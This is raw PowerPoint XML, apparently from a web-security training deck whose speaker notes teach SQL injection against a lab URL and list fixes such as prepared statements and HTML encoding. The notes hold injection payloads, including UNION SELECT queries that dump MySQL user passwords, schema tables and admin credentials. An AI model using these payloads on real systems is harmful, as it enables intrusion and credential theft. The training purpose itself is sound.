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34"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="295" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="318" r:id="rId4"/>
    <p:sldId id="278" r:id="rId5"/>
    <p:sldId id="289" r:id="rId6"/>
    <p:sldId id="276" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="296" r:id="rId12"/>
    <p:sldId id="308" r:id="rId13"/>
    <p:sldId id="298" r:id="rId14"/>
    <p:sldId id="299" r:id="rId15"/>
    <p:sldId id="300" r:id="rId16"/>
    <p:sldId id="302" r:id="rId17"/>
    <p:sldId id="303" r:id="rId18"/>
    <p:sldId id="304" r:id="rId19"/>
    <p:sldId id="305" r:id="rId20"/>
    <p:sldId id="306" r:id="rId21"/>
    <p:sldId id="293" r:id="rId22"/>
    <p:sldId id="310" r:id="rId23"/>
    <p:sldId id="311" r:id="rId24"/>
    <p:sldId id="312" r:id="rId25"/>
    <p:sldId id="313" r:id="rId26"/>
    <p:sldId id="314" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="317" r:id="rId29"/>
    <p:sldId id="294" r:id="rId30"/>
    <p:sldId id="285" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="275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02" autoAdjust="0"/>
    <p:restoredTop sz="92059" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="104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BE81BA0-69D2-4249-AFAD-1E1F7F941529}" type="datetimeFigureOut">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/05/2020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2FE493F-A2F7-4549-BA1E-D203250F64D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282619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339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de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Type ‚ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>manual</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin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srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://training.yt/sql/sqli1.jsp?category=animal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TODO:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P1: ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dsd</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P2: ` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ‘1‘ = ‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P3: ‘ and ‘1‘ = ‘2 check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P4: ‘ and ‘1‘ = ‘1 check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p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4468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009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de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Type ‚ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>manual</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin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srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://training.yt/sql/sqli1.jsp?category=animal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TODO:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P1: ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dsd</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P2: ` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ‘1‘ = ‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P3: ‘ and ‘1‘ = ‘2 check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P4: ‘ and ‘1‘ = ‘1 check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>condition</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p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8350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de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>: .net: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>System.Web.HttpUtility.HtmlEncode</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Workshop: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>querys</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Soll: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>prepared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>statements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, parse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>special</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>numbers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>under</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>single</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>HEADERS!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-DE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977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877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056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333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671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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-A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/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MySQL 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-A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/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URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://training.yt/sql/sqli1.jsp?category=animal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-A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/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P1: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 UNION SELECT host, null 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mysql.user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;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct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P2: ' UNION SELECT user, password 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mysql.user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;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P3: 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 UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-A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</a:t>
            </a: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 null;-- - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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P4: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 UNION SELECT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table_schema,table_name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information_schema.tables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WHERE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table_schema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'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hackdb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';-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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P5: ' UNION SELECT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table_name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column_name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information_schema.columns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WHERE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table_schema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'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hackdb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';-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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P6: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 UNION SELECT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user_name,user_password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users;-- - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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P7: ' UNION SELECT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user_name,user_password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users where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isAdmin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=true ;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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slides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/>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="de-DE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177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98804C-7314-41F8-9648-B97C06432D0F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{52176D69-38F7-4A55-9DE3-2F6032E3161D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0053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65B0-50A4-4DF6-9629-90D46F5E2AEA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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25B6E-B18E-43A6-BE5E-4B3C3A6D3F38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171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5DD057-42FE-4419-8A2C-D75D7C3EB97C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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474379-4E8F-4BF7-83FB-76B90DD2336A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54325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43608" y="316412"/>
            <a:ext cx="7849567" cy="678953"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2215"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Titel: Arial fett, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>right-al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>., min. 24 Pkt. – max. 34 Pkt. For a two-line Titel – max. 28 Pkt. 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50826" y="1584000"/>
            <a:ext cx="8642349" cy="4752974"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="316531" indent="-316531">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2215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17" indent="-263776">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1846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55103" indent="-211021">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1846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7145" indent="-211021">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1846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99186" indent="-211021">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1846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Bullet-points: blue, Text black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SEC Consult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62AB44-3536-4DFC-8309-85195EA41A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68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CB2FC2-69C8-462D-B4B5-6F16EACA81D0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
